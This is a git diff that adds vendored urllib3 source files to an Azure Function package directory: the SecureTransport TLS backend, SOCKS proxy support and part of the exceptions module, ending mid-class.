SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA256, + SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA256, + SecurityConst.TLS_RSA_WITH_AES_256_CBC_SHA, + SecurityConst.TLS_RSA_WITH_AES_128_CBC_SHA, +] + +# Basically this is simple: for PROTOCOL_SSLv23 we turn it into a low of +# TLSv1 and a high of TLSv1.2. For everything else, we pin to that version. +# TLSv1 to 1.2 are supported on macOS 10.8+ +_protocol_to_min_max = { + util.PROTOCOL_TLS: (SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol12), + PROTOCOL_TLS_CLIENT: (SecurityConst.kTLSProtocol1, SecurityConst.kTLSProtocol12), +} + +if hasattr(ssl, "PROTOCOL_SSLv2"): + _protocol_to_min_max[ssl.PROTOCOL_SSLv2] = ( + SecurityConst.kSSLProtocol2, + SecurityConst.kSSLProtocol2, + ) +if hasattr(ssl, "PROTOCOL_SSLv3"): + _protocol_to_min_max[ssl.PROTOCOL_SSLv3] = ( + SecurityConst.kSSLProtocol3, + SecurityConst.kSSLProtocol3, + ) +if hasattr(ssl, "PROTOCOL_TLSv1"): + _protocol_to_min_max[ssl.PROTOCOL_TLSv1] = ( + SecurityConst.kTLSProtocol1, + SecurityConst.kTLSProtocol1, + ) +if hasattr(ssl, "PROTOCOL_TLSv1_1"): + _protocol_to_min_max[ssl.PROTOCOL_TLSv1_1] = ( + SecurityConst.kTLSProtocol11, + SecurityConst.kTLSProtocol11, + ) +if hasattr(ssl, "PROTOCOL_TLSv1_2"): + _protocol_to_min_max[ssl.PROTOCOL_TLSv1_2] = ( + SecurityConst.kTLSProtocol12, + SecurityConst.kTLSProtocol12, + ) + + +def inject_into_urllib3(): + """ + Monkey-patch urllib3 with SecureTransport-backed SSL-support. + """ + util.SSLContext = SecureTransportContext + util.ssl_.SSLContext = SecureTransportContext + util.HAS_SNI = HAS_SNI + util.ssl_.HAS_SNI = HAS_SNI + util.IS_SECURETRANSPORT = True + util.ssl_.IS_SECURETRANSPORT = True + + +def extract_from_urllib3(): + """ + Undo monkey-patching by :func:`inject_into_urllib3`. + """ + util.SSLContext = orig_util_SSLContext + util.ssl_.SSLContext = orig_util_SSLContext + util.HAS_SNI = orig_util_HAS_SNI + util.ssl_.HAS_SNI = orig_util_HAS_SNI + util.IS_SECURETRANSPORT = False + util.ssl_.IS_SECURETRANSPORT = False + + +def _read_callback(connection_id, data_buffer, data_length_pointer): + """ + SecureTransport read callback. This is called by ST to request that data + be returned from the socket. + """ + wrapped_socket = None + try: + wrapped_socket = _connection_refs.get(connection_id) + if wrapped_socket is None: + return SecurityConst.errSSLInternal + base_socket = wrapped_socket.socket + + requested_length = data_length_pointer[0] + + timeout = wrapped_socket.gettimeout() + error = None + read_count = 0 + + try: + while read_count < requested_length: + if timeout is None or timeout >= 0: + if not util.wait_for_read(base_socket, timeout): + raise socket.error(errno.EAGAIN, "timed out") + + remaining = requested_length - read_count + buffer = (ctypes.c_char * remaining).from_address( + data_buffer + read_count + ) + chunk_size = base_socket.recv_into(buffer, remaining) + read_count += chunk_size + if not chunk_size: + if not read_count: + return SecurityConst.errSSLClosedGraceful + break + except (socket.error) as e: + error = e.errno + + if error is not None and error != errno.EAGAIN: + data_length_pointer[0] = read_count + if error == errno.ECONNRESET or error == errno.EPIPE: + return SecurityConst.errSSLClosedAbort + raise + + data_length_pointer[0] = read_count + + if read_count != requested_length: + return SecurityConst.errSSLWouldBlock + + return 0 + except Exception as e: + if wrapped_socket is not None: + wrapped_socket._exception = e + return SecurityConst.errSSLInternal + + +def _write_callback(connection_id, data_buffer, data_length_pointer): + """ + SecureTransport write callback. This is called by ST to request that data + actually be sent on the network. + """ + wrapped_socket = None + try: + wrapped_socket = _connection_refs.get(connection_id) + if wrapped_socket is None: + return SecurityConst.errSSLInternal + base_socket = wrapped_socket.socket + + bytes_to_write = data_length_pointer[0] + data = ctypes.string_at(data_buffer, bytes_to_write) + + timeout = wrapped_socket.gettimeout() + error = None + sent = 0 + + try: + while sent < bytes_to_write: + if timeout is None or timeout >= 0: + if not util.wait_for_write(base_socket, timeout): + raise socket.error(errno.EAGAIN, "timed out") + chunk_sent = base_socket.send(data) + sent += chunk_sent + + # This has some needless copying here, but I'm not sure there's + # much value in optimising this data path. + data = data[chunk_sent:] + except (socket.error) as e: + error = e.errno + + if error is not None and error != errno.EAGAIN: + data_length_pointer[0] = sent + if error == errno.ECONNRESET or error == errno.EPIPE: + return SecurityConst.errSSLClosedAbort + raise + + data_length_pointer[0] = sent + + if sent != bytes_to_write: + return SecurityConst.errSSLWouldBlock + + return 0 + except Exception as e: + if wrapped_socket is not None: + wrapped_socket._exception = e + return SecurityConst.errSSLInternal + + +# We need to keep these two objects references alive: if they get GC'd while +# in use then SecureTransport could attempt to call a function that is in freed +# memory. That would be...uh...bad. Yeah, that's the word. Bad. +_read_callback_pointer = Security.SSLReadFunc(_read_callback) +_write_callback_pointer = Security.SSLWriteFunc(_write_callback) + + +class WrappedSocket(object): + """ + API-compatibility wrapper for Python's OpenSSL wrapped socket object. + + Note: _makefile_refs, _drop(), and _reuse() are needed for the garbage + collector of PyPy. + """ + + def __init__(self, socket): + self.socket = socket + self.context = None + self._makefile_refs = 0 + self._closed = False + self._exception = None + self._keychain = None + self._keychain_dir = None + self._client_cert_chain = None + + # We save off the previously-configured timeout and then set it to + # zero. This is done because we use select and friends to handle the + # timeouts, but if we leave the timeout set on the lower socket then + # Python will "kindly" call select on that socket again for us. Avoid + # that by forcing the timeout to zero. + self._timeout = self.socket.gettimeout() + self.socket.settimeout(0) + + @contextlib.contextmanager + def _raise_on_error(self): + """ + A context manager that can be used to wrap calls that do I/O from + SecureTransport. If any of the I/O callbacks hit an exception, this + context manager will correctly propagate the exception after the fact. + This avoids silently swallowing those exceptions. + + It also correctly forces the socket closed. + """ + self._exception = None + + # We explicitly don't catch around this yield because in the unlikely + # event that an exception was hit in the block we don't want to swallow + # it. + yield + if self._exception is not None: + exception, self._exception = self._exception, None + self.close() + raise exception + + def _set_ciphers(self): + """ + Sets up the allowed ciphers. By default this matches the set in + util.ssl_.DEFAULT_CIPHERS, at least as supported by macOS. This is done + custom and doesn't allow changing at this time, mostly because parsing + OpenSSL cipher strings is going to be a freaking nightmare. + """ + ciphers = (Security.SSLCipherSuite * len(CIPHER_SUITES))(*CIPHER_SUITES) + result = Security.SSLSetEnabledCiphers( + self.context, ciphers, len(CIPHER_SUITES) + ) + _assert_no_error(result) + + def _set_alpn_protocols(self, protocols): + """ + Sets up the ALPN protocols on the context. + """ + if not protocols: + return + protocols_arr = _create_cfstring_array(protocols) + try: + result = Security.SSLSetALPNProtocols(self.context, protocols_arr) + _assert_no_error(result) + finally: + CoreFoundation.CFRelease(protocols_arr) + + def _custom_validate(self, verify, trust_bundle): + """ + Called when we have set custom validation. We do this in two cases: + first, when cert validation is entirely disabled; and second, when + using a custom trust DB. + Raises an SSLError if the connection is not trusted. + """ + # If we disabled cert validation, just say: cool. + if not verify: + return + + successes = ( + SecurityConst.kSecTrustResultUnspecified, + SecurityConst.kSecTrustResultProceed, + ) + try: + trust_result = self._evaluate_trust(trust_bundle) + if trust_result in successes: + return + reason = "error code: %d" % (trust_result,) + except Exception as e: + # Do not trust on error + reason = "exception: %r" % (e,) + + # SecureTransport does not send an alert nor shuts down the connection. + rec = _build_tls_unknown_ca_alert(self.version()) + self.socket.sendall(rec) + # close the connection immediately + # l_onoff = 1, activate linger + # l_linger = 0, linger for 0 seoncds + opts = struct.pack("ii", 1, 0) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, opts) + self.close() + raise ssl.SSLError("certificate verify failed, %s" % reason) + + def _evaluate_trust(self, trust_bundle): + # We want data in memory, so load it up. + if os.path.isfile(trust_bundle): + with open(trust_bundle, "rb") as f: + trust_bundle = f.read() + + cert_array = None + trust = Security.SecTrustRef() + + try: + # Get a CFArray that contains the certs we want. + cert_array = _cert_array_from_pem(trust_bundle) + + # Ok, now the hard part. We want to get the SecTrustRef that ST has + # created for this connection, shove our CAs into it, tell ST to + # ignore everything else it knows, and then ask if it can build a + # chain. This is a buuuunch of code. + result = Security.SSLCopyPeerTrust(self.context, ctypes.byref(trust)) + _assert_no_error(result) + if not trust: + raise ssl.SSLError("Failed to copy trust reference") + + result = Security.SecTrustSetAnchorCertificates(trust, cert_array) + _assert_no_error(result) + + result = Security.SecTrustSetAnchorCertificatesOnly(trust, True) + _assert_no_error(result) + + trust_result = Security.SecTrustResultType() + result = Security.SecTrustEvaluate(trust, ctypes.byref(trust_result)) + _assert_no_error(result) + finally: + if trust: + CoreFoundation.CFRelease(trust) + + if cert_array is not None: + CoreFoundation.CFRelease(cert_array) + + return trust_result.value + + def handshake( + self, + server_hostname, + verify, + trust_bundle, + min_version, + max_version, + client_cert, + client_key, + client_key_passphrase, + alpn_protocols, + ): + """ + Actually performs the TLS handshake. This is run automatically by + wrapped socket, and shouldn't be needed in user code. + """ + # First, we do the initial bits of connection setup. We need to create + # a context, set its I/O funcs, and set the connection reference. + self.context = Security.SSLCreateContext( + None, SecurityConst.kSSLClientSide, SecurityConst.kSSLStreamType + ) + result = Security.SSLSetIOFuncs( + self.context, _read_callback_pointer, _write_callback_pointer + ) + _assert_no_error(result) + + # Here we need to compute the handle to use. We do this by taking the + # id of self modulo 2**31 - 1. If this is already in the dictionary, we + # just keep incrementing by one until we find a free space. + with _connection_ref_lock: + handle = id(self) % 2147483647 + while handle in _connection_refs: + handle = (handle + 1) % 2147483647 + _connection_refs[handle] = self + + result = Security.SSLSetConnection(self.context, handle) + _assert_no_error(result) + + # If we have a server hostname, we should set that too. + if server_hostname: + if not isinstance(server_hostname, bytes): + server_hostname = server_hostname.encode("utf-8") + + result = Security.SSLSetPeerDomainName( + self.context, server_hostname, len(server_hostname) + ) + _assert_no_error(result) + + # Setup the ciphers. + self._set_ciphers() + + # Setup the ALPN protocols. + self._set_alpn_protocols(alpn_protocols) + + # Set the minimum and maximum TLS versions. + result = Security.SSLSetProtocolVersionMin(self.context, min_version) + _assert_no_error(result) + + result = Security.SSLSetProtocolVersionMax(self.context, max_version) + _assert_no_error(result) + + # If there's a trust DB, we need to use it. We do that by telling + # SecureTransport to break on server auth. We also do that if we don't + # want to validate the certs at all: we just won't actually do any + # authing in that case. + if not verify or trust_bundle is not None: + result = Security.SSLSetSessionOption( + self.context, SecurityConst.kSSLSessionOptionBreakOnServerAuth, True + ) + _assert_no_error(result) + + # If there's a client cert, we need to use it. + if client_cert: + self._keychain, self._keychain_dir = _temporary_keychain() + self._client_cert_chain = _load_client_cert_chain( + self._keychain, client_cert, client_key + ) + result = Security.SSLSetCertificate(self.context, self._client_cert_chain) + _assert_no_error(result) + + while True: + with self._raise_on_error(): + result = Security.SSLHandshake(self.context) + + if result == SecurityConst.errSSLWouldBlock: + raise socket.timeout("handshake timed out") + elif result == SecurityConst.errSSLServerAuthCompleted: + self._custom_validate(verify, trust_bundle) + continue + else: + _assert_no_error(result) + break + + def fileno(self): + return self.socket.fileno() + + # Copy-pasted from Python 3.5 source code + def _decref_socketios(self): + if self._makefile_refs > 0: + self._makefile_refs -= 1 + if self._closed: + self.close() + + def recv(self, bufsiz): + buffer = ctypes.create_string_buffer(bufsiz) + bytes_read = self.recv_into(buffer, bufsiz) + data = buffer[:bytes_read] + return data + + def recv_into(self, buffer, nbytes=None): + # Read short on EOF. + if self._closed: + return 0 + + if nbytes is None: + nbytes = len(buffer) + + buffer = (ctypes.c_char * nbytes).from_buffer(buffer) + processed_bytes = ctypes.c_size_t(0) + + with self._raise_on_error(): + result = Security.SSLRead( + self.context, buffer, nbytes, ctypes.byref(processed_bytes) + ) + + # There are some result codes that we want to treat as "not always + # errors". Specifically, those are errSSLWouldBlock, + # errSSLClosedGraceful, and errSSLClosedNoNotify. + if result == SecurityConst.errSSLWouldBlock: + # If we didn't process any bytes, then this was just a time out. + # However, we can get errSSLWouldBlock in situations when we *did* + # read some data, and in those cases we should just read "short" + # and return. + if processed_bytes.value == 0: + # Timed out, no data read. + raise socket.timeout("recv timed out") + elif result in ( + SecurityConst.errSSLClosedGraceful, + SecurityConst.errSSLClosedNoNotify, + ): + # The remote peer has closed this connection. We should do so as + # well. Note that we don't actually return here because in + # principle this could actually be fired along with return data. + # It's unlikely though. + self.close() + else: + _assert_no_error(result) + + # Ok, we read and probably succeeded. We should return whatever data + # was actually read. + return processed_bytes.value + + def settimeout(self, timeout): + self._timeout = timeout + + def gettimeout(self): + return self._timeout + + def send(self, data): + processed_bytes = ctypes.c_size_t(0) + + with self._raise_on_error(): + result = Security.SSLWrite( + self.context, data, len(data), ctypes.byref(processed_bytes) + ) + + if result == SecurityConst.errSSLWouldBlock and processed_bytes.value == 0: + # Timed out + raise socket.timeout("send timed out") + else: + _assert_no_error(result) + + # We sent, and probably succeeded. Tell them how much we sent. + return processed_bytes.value + + def sendall(self, data): + total_sent = 0 + while total_sent < len(data): + sent = self.send(data[total_sent : total_sent + SSL_WRITE_BLOCKSIZE]) + total_sent += sent + + def shutdown(self): + with self._raise_on_error(): + Security.SSLClose(self.context) + + def close(self): + # TODO: should I do clean shutdown here? Do I have to? + if self._makefile_refs < 1: + self._closed = True + if self.context: + CoreFoundation.CFRelease(self.context) + self.context = None + if self._client_cert_chain: + CoreFoundation.CFRelease(self._client_cert_chain) + self._client_cert_chain = None + if self._keychain: + Security.SecKeychainDelete(self._keychain) + CoreFoundation.CFRelease(self._keychain) + shutil.rmtree(self._keychain_dir) + self._keychain = self._keychain_dir = None + return self.socket.close() + else: + self._makefile_refs -= 1 + + def getpeercert(self, binary_form=False): + # Urgh, annoying. + # + # Here's how we do this: + # + # 1. Call SSLCopyPeerTrust to get hold of the trust object for this + # connection. + # 2. Call SecTrustGetCertificateAtIndex for index 0 to get the leaf. + # 3. To get the CN, call SecCertificateCopyCommonName and process that + # string so that it's of the appropriate type. + # 4. To get the SAN, we need to do something a bit more complex: + # a. Call SecCertificateCopyValues to get the data, requesting + # kSecOIDSubjectAltName. + # b. Mess about with this dictionary to try to get the SANs out. + # + # This is gross. Really gross. It's going to be a few hundred LoC extra + # just to repeat something that SecureTransport can *already do*. So my + # operating assumption at this time is that what we want to do is + # instead to just flag to urllib3 that it shouldn't do its own hostname + # validation when using SecureTransport. + if not binary_form: + raise ValueError("SecureTransport only supports dumping binary certs") + trust = Security.SecTrustRef() + certdata = None + der_bytes = None + + try: + # Grab the trust store. + result = Security.SSLCopyPeerTrust(self.context, ctypes.byref(trust)) + _assert_no_error(result) + if not trust: + # Probably we haven't done the handshake yet. No biggie. + return None + + cert_count = Security.SecTrustGetCertificateCount(trust) + if not cert_count: + # Also a case that might happen if we haven't handshaked. + # Handshook? Handshaken? + return None + + leaf = Security.SecTrustGetCertificateAtIndex(trust, 0) + assert leaf + + # Ok, now we want the DER bytes. + certdata = Security.SecCertificateCopyData(leaf) + assert certdata + + data_length = CoreFoundation.CFDataGetLength(certdata) + data_buffer = CoreFoundation.CFDataGetBytePtr(certdata) + der_bytes = ctypes.string_at(data_buffer, data_length) + finally: + if certdata: + CoreFoundation.CFRelease(certdata) + if trust: + CoreFoundation.CFRelease(trust) + + return der_bytes + + def version(self): + protocol = Security.SSLProtocol() + result = Security.SSLGetNegotiatedProtocolVersion( + self.context, ctypes.byref(protocol) + ) + _assert_no_error(result) + if protocol.value == SecurityConst.kTLSProtocol13: + raise ssl.SSLError("SecureTransport does not support TLS 1.3") + elif protocol.value == SecurityConst.kTLSProtocol12: + return "TLSv1.2" + elif protocol.value == SecurityConst.kTLSProtocol11: + return "TLSv1.1" + elif protocol.value == SecurityConst.kTLSProtocol1: + return "TLSv1" + elif protocol.value == SecurityConst.kSSLProtocol3: + return "SSLv3" + elif protocol.value == SecurityConst.kSSLProtocol2: + return "SSLv2" + else: + raise ssl.SSLError("Unknown TLS version: %r" % protocol) + + def _reuse(self): + self._makefile_refs += 1 + + def _drop(self): + if self._makefile_refs < 1: + self.close() + else: + self._makefile_refs -= 1 + + +if _fileobject: # Platform-specific: Python 2 + + def makefile(self, mode, bufsize=-1): + self._makefile_refs += 1 + return _fileobject(self, mode, bufsize, close=True) + + +else: # Platform-specific: Python 3 + + def makefile(self, mode="r", buffering=None, *args, **kwargs): + # We disable buffering with SecureTransport because it conflicts with + # the buffering that ST does internally (see issue #1153 for more). + buffering = 0 + return backport_makefile(self, mode, buffering, *args, **kwargs) + + +WrappedSocket.makefile = makefile + + +class SecureTransportContext(object): + """ + I am a wrapper class for the SecureTransport library, to translate the + interface of the standard library ``SSLContext`` object to calls into + SecureTransport. + """ + + def __init__(self, protocol): + self._min_version, self._max_version = _protocol_to_min_max[protocol] + self._options = 0 + self._verify = False + self._trust_bundle = None + self._client_cert = None + self._client_key = None + self._client_key_passphrase = None + self._alpn_protocols = None + + @property + def check_hostname(self): + """ + SecureTransport cannot have its hostname checking disabled. For more, + see the comment on getpeercert() in this file. + """ + return True + + @check_hostname.setter + def check_hostname(self, value): + """ + SecureTransport cannot have its hostname checking disabled. For more, + see the comment on getpeercert() in this file. + """ + pass + + @property + def options(self): + # TODO: Well, crap. + # + # So this is the bit of the code that is the most likely to cause us + # trouble. Essentially we need to enumerate all of the SSL options that + # users might want to use and try to see if we can sensibly translate + # them, or whether we should just ignore them. + return self._options + + @options.setter + def options(self, value): + # TODO: Update in line with above. + self._options = value + + @property + def verify_mode(self): + return ssl.CERT_REQUIRED if self._verify else ssl.CERT_NONE + + @verify_mode.setter + def verify_mode(self, value): + self._verify = True if value == ssl.CERT_REQUIRED else False + + def set_default_verify_paths(self): + # So, this has to do something a bit weird. Specifically, what it does + # is nothing. + # + # This means that, if we had previously had load_verify_locations + # called, this does not undo that. We need to do that because it turns + # out that the rest of the urllib3 code will attempt to load the + # default verify paths if it hasn't been told about any paths, even if + # the context itself was sometime earlier. We resolve that by just + # ignoring it. + pass + + def load_default_certs(self): + return self.set_default_verify_paths() + + def set_ciphers(self, ciphers): + # For now, we just require the default cipher string. + if ciphers != util.ssl_.DEFAULT_CIPHERS: + raise ValueError("SecureTransport doesn't support custom cipher strings") + + def load_verify_locations(self, cafile=None, capath=None, cadata=None): + # OK, we only really support cadata and cafile. + if capath is not None: + raise ValueError("SecureTransport does not support cert directories") + + # Raise if cafile does not exist. + if cafile is not None: + with open(cafile): + pass + + self._trust_bundle = cafile or cadata + + def load_cert_chain(self, certfile, keyfile=None, password=None): + self._client_cert = certfile + self._client_key = keyfile + self._client_cert_passphrase = password + + def set_alpn_protocols(self, protocols): + """ + Sets the ALPN protocols that will later be set on the context. + + Raises a NotImplementedError if ALPN is not supported. + """ + if not hasattr(Security, "SSLSetALPNProtocols"): + raise NotImplementedError( + "SecureTransport supports ALPN only in macOS 10.12+" + ) + self._alpn_protocols = [six.ensure_binary(p) for p in protocols] + + def wrap_socket( + self, + sock, + server_side=False, + do_handshake_on_connect=True, + suppress_ragged_eofs=True, + server_hostname=None, + ): + # So, what do we do here? Firstly, we assert some properties. This is a + # stripped down shim, so there is some functionality we don't support. + # See PEP 543 for the real deal. + assert not server_side + assert do_handshake_on_connect + assert suppress_ragged_eofs + + # Ok, we're good to go. Now we want to create the wrapped socket object + # and store it in the appropriate place. + wrapped_socket = WrappedSocket(sock) + + # Now we can handshake + wrapped_socket.handshake( + server_hostname, + self._verify, + self._trust_bundle, + self._min_version, + self._max_version, + self._client_cert, + self._client_key, + self._client_key_passphrase, + self._alpn_protocols, + ) + return wrapped_socket diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/socks.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/socks.py new file mode 100644 index 0000000..eb90f9d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/socks.py @@ -0,0 +1,216 @@ +# -*- coding: utf-8 -*- +""" +This module contains provisional support for SOCKS proxies from within +urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and +SOCKS5. To enable its functionality, either install PySocks or install this +module with the ``socks`` extra. + +The SOCKS implementation supports the full range of urllib3 features. It also +supports the following SOCKS features: + +- SOCKS4A (``proxy_url='socks4a://...``) +- SOCKS4 (``proxy_url='socks4://...``) +- SOCKS5 with remote DNS (``proxy_url='socks5h://...``) +- SOCKS5 with local DNS (``proxy_url='socks5://...``) +- Usernames and passwords for the SOCKS proxy + +.. note:: + It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in + your ``proxy_url`` to ensure that DNS resolution is done from the remote + server instead of client-side when connecting to a domain name. + +SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5 +supports IPv4, IPv6, and domain names. + +When connecting to a SOCKS4 proxy the ``username`` portion of the ``proxy_url`` +will be sent as the ``userid`` section of the SOCKS request: + +.. code-block:: python + + proxy_url="socks4a://@proxy-host" + +When connecting to a SOCKS5 proxy the ``username`` and ``password`` portion +of the ``proxy_url`` will be sent as the username/password to authenticate +with the proxy: + +.. code-block:: python + + proxy_url="socks5h://:@proxy-host" + +""" +from __future__ import absolute_import + +try: + import socks +except ImportError: + import warnings + + from ..exceptions import DependencyWarning + + warnings.warn( + ( + "SOCKS support in urllib3 requires the installation of optional " + "dependencies: specifically, PySocks. For more information, see " + "https://urllib3.readthedocs.io/en/1.26.x/contrib.html#socks-proxies" + ), + DependencyWarning, + ) + raise + +from socket import error as SocketError +from socket import timeout as SocketTimeout + +from ..connection import HTTPConnection, HTTPSConnection +from ..connectionpool import HTTPConnectionPool, HTTPSConnectionPool +from ..exceptions import ConnectTimeoutError, NewConnectionError +from ..poolmanager import PoolManager +from ..util.url import parse_url + +try: + import ssl +except ImportError: + ssl = None + + +class SOCKSConnection(HTTPConnection): + """ + A plain-text HTTP connection that connects via a SOCKS proxy. + """ + + def __init__(self, *args, **kwargs): + self._socks_options = kwargs.pop("_socks_options") + super(SOCKSConnection, self).__init__(*args, **kwargs) + + def _new_conn(self): + """ + Establish a new connection via the SOCKS proxy. + """ + extra_kw = {} + if self.source_address: + extra_kw["source_address"] = self.source_address + + if self.socket_options: + extra_kw["socket_options"] = self.socket_options + + try: + conn = socks.create_connection( + (self.host, self.port), + proxy_type=self._socks_options["socks_version"], + proxy_addr=self._socks_options["proxy_host"], + proxy_port=self._socks_options["proxy_port"], + proxy_username=self._socks_options["username"], + proxy_password=self._socks_options["password"], + proxy_rdns=self._socks_options["rdns"], + timeout=self.timeout, + **extra_kw + ) + + except SocketTimeout: + raise ConnectTimeoutError( + self, + "Connection to %s timed out. (connect timeout=%s)" + % (self.host, self.timeout), + ) + + except socks.ProxyError as e: + # This is fragile as hell, but it seems to be the only way to raise + # useful errors here. + if e.socket_err: + error = e.socket_err + if isinstance(error, SocketTimeout): + raise ConnectTimeoutError( + self, + "Connection to %s timed out. (connect timeout=%s)" + % (self.host, self.timeout), + ) + else: + raise NewConnectionError( + self, "Failed to establish a new connection: %s" % error + ) + else: + raise NewConnectionError( + self, "Failed to establish a new connection: %s" % e + ) + + except SocketError as e: # Defensive: PySocks should catch all these. + raise NewConnectionError( + self, "Failed to establish a new connection: %s" % e + ) + + return conn + + +# We don't need to duplicate the Verified/Unverified distinction from +# urllib3/connection.py here because the HTTPSConnection will already have been +# correctly set to either the Verified or Unverified form by that module. This +# means the SOCKSHTTPSConnection will automatically be the correct type. +class SOCKSHTTPSConnection(SOCKSConnection, HTTPSConnection): + pass + + +class SOCKSHTTPConnectionPool(HTTPConnectionPool): + ConnectionCls = SOCKSConnection + + +class SOCKSHTTPSConnectionPool(HTTPSConnectionPool): + ConnectionCls = SOCKSHTTPSConnection + + +class SOCKSProxyManager(PoolManager): + """ + A version of the urllib3 ProxyManager that routes connections via the + defined SOCKS proxy. + """ + + pool_classes_by_scheme = { + "http": SOCKSHTTPConnectionPool, + "https": SOCKSHTTPSConnectionPool, + } + + def __init__( + self, + proxy_url, + username=None, + password=None, + num_pools=10, + headers=None, + **connection_pool_kw + ): + parsed = parse_url(proxy_url) + + if username is None and password is None and parsed.auth is not None: + split = parsed.auth.split(":") + if len(split) == 2: + username, password = split + if parsed.scheme == "socks5": + socks_version = socks.PROXY_TYPE_SOCKS5 + rdns = False + elif parsed.scheme == "socks5h": + socks_version = socks.PROXY_TYPE_SOCKS5 + rdns = True + elif parsed.scheme == "socks4": + socks_version = socks.PROXY_TYPE_SOCKS4 + rdns = False + elif parsed.scheme == "socks4a": + socks_version = socks.PROXY_TYPE_SOCKS4 + rdns = True + else: + raise ValueError("Unable to determine SOCKS version from %s" % proxy_url) + + self.proxy_url = proxy_url + + socks_options = { + "socks_version": socks_version, + "proxy_host": parsed.host, + "proxy_port": parsed.port, + "username": username, + "password": password, + "rdns": rdns, + } + connection_pool_kw["_socks_options"] = socks_options + + super(SOCKSProxyManager, self).__init__( + num_pools, headers, **connection_pool_kw + ) + + self.pool_classes_by_scheme = SOCKSProxyManager.pool_classes_by_scheme diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/exceptions.py new file mode 100644 index 0000000..7f4037a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/exceptions.py @@ -0,0 +1,323 @@ +from __future__ import absolute_import + +from .packages.six.moves.http_client import IncompleteRead as httplib_IncompleteRead + +# Base Exceptions + + +class HTTPError(Exception): + """Base exception used by this module.""" + + pass + + +class HTTPWarning(Warning): + """Base warning used by this module.""" + + pass + + +class PoolError(HTTPError): + """Base exception for errors caused within a pool.""" + + def __init__(self, pool, message): + self.pool = pool + HTTPError.__init__(self, "%s: %s" % (pool, message)) + + def __reduce__(self): + # For pickling purposes. + return self.__class__, (None, None) + + +class RequestError(PoolError): + """Base exception for PoolErrors that have associated URLs.""" + + def __init__(self, pool, url, message): + self.url = url + PoolError.__init__(self, pool, message) + + def __reduce__(self): + # For pickling purposes. + return self.__class__, (None, self.url, None) + + +class SSLError(HTTPError): + """Raised when SSL certificate fails in an HTTPS connection.""" + + pass + + +class ProxyError(HTTPError): + """Raised when the connection to a proxy fails.""" + + def __init__(self, message, error, *args): + super(ProxyError, self).__init__(message, error, *args) + self.original_error = error + + +class DecodeError(HTTPError): + """Raised when automatic decoding based on Content-Type fails.""" + + pass + + +class ProtocolError(HTTPError): + """Raised when something unexpected happens mid-request/response.""" + + pass + + +#: Renamed to ProtocolError but aliased for backwards compatibility. +ConnectionError = ProtocolError + + +# Leaf Exceptions + + +class MaxRetryError(RequestError): + """Raised when the maximum number of retries is exceeded. + + :param pool: The connection pool + :type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool` + :param string url: The requested Url + :param exceptions.Exception reason: The underlying error + + """ + + def __init__(self, pool, url, reason=None): + self.reason = reason + + message = "Max retries exceeded with url: %s (Caused by %r)" % (url, reason) + + RequestError.__init__(self, pool, url, message) + + +class HostChangedError(RequestError): + """Raised when an existing pool gets a request for a foreign host.""" + + def __init__(self, pool, url, retries=3): + message = "Tried to open a foreign host with url: %s" % url + RequestError.__init__(self, pool, url, message) + self.retries = retries + + +class TimeoutStateError(HTTPError): + """Raised when passing an invalid state to a timeout""" + + pass + + +class TimeoutError(HTTPError): + """Raised when a socket timeout error occurs. + + Catching this error will catch both :exc:`ReadTimeoutErrors + ` and :exc:`ConnectTimeoutErrors `. + """ + + pass + + +class ReadTimeoutError(TimeoutError, RequestError): + """Raised when a socket timeout occurs while receiving data from a server""" + + pass + + +# This timeout error does not have a URL attached and needs to inherit from the +# base HTTPError +class ConnectTimeoutError(TimeoutError): + """Raised when a socket timeout occurs while connecting to a server""" + + pass + + +class NewConnectionError(ConnectTimeoutError, PoolError): + """Raised when we fail to establish a new connection. Usually ECONNREFUSED.""" + + pass + + +class EmptyPoolError(PoolError): + """Raised when a pool runs out of connections and no more are allowed.""" + + pass + + +class ClosedPoolError(PoolError): + """Raised when a request enters a pool after the pool has been closed.""" + + pass + + +class LocationValueError(ValueError, HTTPError): + """Raised when there is something wrong with a given URL input.""" + + pass + + +class LocationParseError(LocationValueError): + """Raised when get_host or similar fails to parse the URL input.""" + + def __init__(self, location): + message = "Failed to parse: %s" % location + HTTPError.__init__(self, message) + + self.location = location + + +class URLSchemeUnknown(LocationValueError): + """Raised when a URL input has an unsupported scheme.""" + + def __init__(self, scheme): + message = "Not supported URL scheme %s" % scheme + super(URLSchemeUnknown, self).__init__(message) + + self.scheme = scheme + + +class ResponseError(HTTPError): + """Used as a container for an error reason supplied in a MaxRetryError.""" + + GENERIC_ERROR = "too many error responses" + SPECIFIC_ERROR = "too many {status_code} error responses" + + +class SecurityWarning(HTTPWarning): + """Warned when performing security reducing actions""" + + pass + + +class SubjectAltNameWarning(SecurityWarning): + """Warned when connecting to a host with a certificate missing a SAN.""" + + pass + + +class InsecureRequestWarning(SecurityWarning): + """Warned when making an unverified HTTPS request.""" + + pass + + +class SystemTimeWarning(SecurityWarning): + """Warned when system time is suspected to be wrong""" + + pass + + +class InsecurePlatformWarning(SecurityWarning): + """Warned when certain TLS/SSL configuration is not available on a platform.""" + + pass + + +class SNIMissingWarning(HTTPWarning): + """Warned when making a HTTPS request without SNI available.""" + + pass + + +class DependencyWarning(HTTPWarning): + """ + Warned when an attempt is made to import a module with missing optional + dependencies. + """ + + pass + + +class ResponseNotChunked(ProtocolError, ValueError): + """Response needs to be chunked in order to read it as chunks.""" + + pass + + +class BodyNotHttplibCompatible(HTTPError): + """ + Body should be :class:`http.client.HTTPResponse` like + (have an fp attribute which returns raw chunks) for read_chunked(). + """ + + pass + + +class IncompleteRead(HTTPError, httplib_IncompleteRead): + """ + Response length doesn't match expected Content-Length + + Subclass of 